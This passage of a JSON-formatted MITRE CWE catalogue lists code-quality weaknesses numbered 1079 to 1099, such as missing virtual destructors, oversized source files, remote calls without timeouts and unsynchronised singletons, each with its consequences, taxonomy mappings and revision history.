0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1079":{"attr":{"@_ID":"1079","@_Name":"Parent Class without Virtual Destructor Method","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A parent class contains one or more child classes, but the parent class does not have a virtual destructor method.","Extended_Description":{"xhtml:p":"This issue can prevent the software from running reliably due to undefined or unexpected behaviors. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1076","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-16"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-16"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1080":{"attr":{"@_ID":"1080","@_Name":"Source Code File with Excessive Number of Lines of Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A source code file has too many lines of\\n\\t\\t\\t\\t\\tcode.","Extended_Description":{"xhtml:p":["This issue makes it more difficult to understand and/or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities.","While the interpretation of \\"too many lines of code\\" may vary for each product or developer, CISQ recommends a default threshold value of 1000."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1120","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-8"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-8"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1082":{"attr":{"@_ID":"1082","@_Name":"Class Instance Self Destruction Control Element","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code contains a class instance that calls the method or function to delete or destroy itself.","Extended_Description":{"xhtml:p":["For example, in C++, \\"delete this\\" will cause the object to delete itself.","This issue can prevent the software from running reliably. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1076","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-7"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-7"}},{"attr":{"@_External_Reference_ID":"REF-976"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1083":{"attr":{"@_ID":"1083","@_Name":"Data Access from Outside Expected Data Manager Component","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software is intended to manage data access through a particular data manager component such as a relational or non-SQL database, but it contains code that performs data access operations without using that component.","Extended_Description":{"xhtml:p":["When the software has a data access component, the design may be intended to handle all data access operations through that component. If a data access operation is performed outside of that component, then this may indicate a violation of the intended design.","This issue can prevent the software from running reliably. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1061","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-10"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-10"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1084":{"attr":{"@_ID":"1084","@_Name":"Invokable Control Element with Excessive File or Data Access Operations","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A function or method contains too many\\n\\t\\t\\t\\t\\toperations that utilize a data manager or file resource.","Extended_Description":{"xhtml:p":["This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities.","While the interpretation of \\"too many operations\\" may vary for each product or developer, CISQ recommends a default maximum of 7 operations for the same data manager or file."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"405","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-14"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-14"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1085":{"attr":{"@_ID":"1085","@_Name":"Invokable Control Element with Excessive Volume of Commented-out Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A function, method, procedure, etc. contains an excessive amount of code that has been\\n\\t\\t\\t\\t\\tcommented out within its body.","Extended_Description":{"xhtml:p":["This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities.","While the interpretation of \\"excessive volume\\" may vary for each product or developer, CISQ recommends a default threshold of 2% of commented code."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1078","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-6"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-6"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1086":{"attr":{"@_ID":"1086","@_Name":"Class with Excessive Number of Child Classes","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A class contains an unnecessarily large number of\\n\\t\\t\\t\\t\\tchildren.","Extended_Description":{"xhtml:p":["This issue makes it more difficult to understand and maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities.","While the interpretation of \\"large number of children\\" may vary for each product or developer, CISQ recommends a default maximum of 10 child classes."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1093","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-18"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-18"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1087":{"attr":{"@_ID":"1087","@_Name":"Class with Virtual Method without a Virtual Destructor","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A class contains a virtual method, but the method does not have an associated virtual destructor.","Extended_Description":{"xhtml:p":"This issue can prevent the software from running reliably, e.g. due to undefined behavior. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1076","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-15"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-15"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1088":{"attr":{"@_ID":"1088","@_Name":"Synchronous Access of Remote Resource without Timeout","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code has a synchronous call to a remote resource, but there is no timeout for the call, or the timeout is set to infinite.","Extended_Description":{"xhtml:p":"This issue can prevent the software from running reliably, since an outage for the remote resource can cause the software to hang. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"821","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-19"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-19"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1089":{"attr":{"@_ID":"1089","@_Name":"Large Data Table with Excessive Number of Indices","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a large data table that contains an excessively large number of\\n\\t\\t\\t\\t\\tindices.","Extended_Description":{"xhtml:p":["This issue can make the software perform more slowly. If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability.","While the interpretation of \\"large data table\\" and \\"excessively large number of indices\\" may vary for each product or developer, CISQ recommends a default threshold of 1000000 rows for a \\"large\\" table and a default threshold of 3 indices."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"405","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Performance"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCPEM"},"Entry_ID":"ASCPEM-PRF-6"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-959","@_Section":"ASCPEM-PRF-6"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1090":{"attr":{"@_ID":"1090","@_Name":"Method Containing Access of a Member Element from Another Class","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A method for a class performs an operation that directly\\n\\t\\t\\t\\t\\taccesses a member element from another class.","Extended_Description":{"xhtml:p":"This issue suggests poor encapsulation and makes it more difficult to understand and maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1061","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-16"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-16"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1091":{"attr":{"@_ID":"1091","@_Name":"Use of Object without Invoking Destructor Method","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains a method that accesses an object but does not later invoke\\n\\t\\t\\t\\t\\tthe element\'s associated finalize/destructor method.","Extended_Description":{"xhtml:p":"This issue can make the software perform more slowly by retaining memory and/or other resources longer than necessary. If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"772","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1076","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Performance"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCPEM"},"Entry_ID":"ASCPEM-PRF-15"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-959","@_Section":"ASCPEM-PRF-15"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1092":{"attr":{"@_ID":"1092","@_Name":"Use of Same Invokable Control Element in Multiple Architectural Layers","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses the same control element across multiple\\n\\t\\t\\t\\t\\tarchitectural layers.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to understand and maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-10"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-10"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."}}},"1093":{"attr":{"@_ID":"1093","@_Name":"Excessively Complex Data Representation","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses an unnecessarily complex internal representation for its data structures or interrelationships between those structures.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to understand or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":[{"Scope":"Other","Impact":"Reduce Maintainability"},{"Scope":"Other","Impact":"Reduce Performance"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-29"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1094":{"attr":{"@_ID":"1094","@_Name":"Excessive Index Range Scan for a Data Resource","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains an index range scan for a large data table,\\n\\t\\t\\t\\t\\tbut the scan can cover a large number of rows.","Extended_Description":{"xhtml:p":["This issue can make the software perform more slowly. If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability.","While the interpretation of \\"large data table\\" and \\"excessive index range\\" may vary for each product or developer, CISQ recommends a threshold of 1000000 table rows and a threshold of 10 for the index range."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"405","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Performance"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCPEM"},"Entry_ID":"ASCPEM-PRF-7"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-959","@_Section":"ASCPEM-PRF-7"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1095":{"attr":{"@_ID":"1095","@_Name":"Loop Condition Value Update within the Loop","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a loop with a control flow condition based on\\n\\t\\t\\t\\t\\ta value that is updated within the body of the loop.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to understand and/or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1120","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-5"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-5"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1096":{"attr":{"@_ID":"1096","@_Name":"Singleton Class Instance Creation without Proper Locking or Synchronization","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software implements a Singleton design pattern but does not use appropriate locking or other synchronization mechanism to ensure that the singleton class is only instantiated once.","Extended_Description":{"xhtml:p":"This issue can prevent the software from running reliably, e.g. by making the instantiation process non-thread-safe and introducing deadlock (CWE-833) or livelock conditions. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"820","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-12"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-12"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"1097":{"attr":{"@_ID":"1097","@_Name":"Persistent Storable Data Element without Associated Comparison Control Element","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a storable data element that does not have\\n\\t\\t\\t\\t\\tall of the associated functions or methods that are necessary to support\\n\\t\\t\\t\\t\\tcomparison.","Extended_Description":{"xhtml:p":["For example, with Java, a class that is made persistent requires both hashCode() and equals() methods to be defined.","This issue can prevent the software from running reliably, due to incorrect or unexpected comparison results. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1076","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"595","@_View_ID":"1305","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-4"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-4"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1098":{"attr":{"@_ID":"1098","@_Name":"Data Element containing Pointer Item without Proper Copy Control Element","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code contains a data element with a pointer that does not have an associated copy or constructor method.","Extended_Description":{"xhtml:p":"This issue can prevent the software from running reliably. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1076","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-6"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-6"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1099":{"attr":{"@_ID":"1099","@_Name":"Inconsistent Naming Conventions for Identifiers","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product\'s code, documentation, or other artifacts do not\\n\\t\\t\\t\\t\\tconsistently use the same naming conventions for variables, callables, groups of\\n\\t\\t\\t\\t\\trelated callables, I/O capabilities, data types, file names, or similar types of\\n\\t\\t\\t\\t\\telements.","Extended_Description":{"xhtml:p":"This issue makes it more 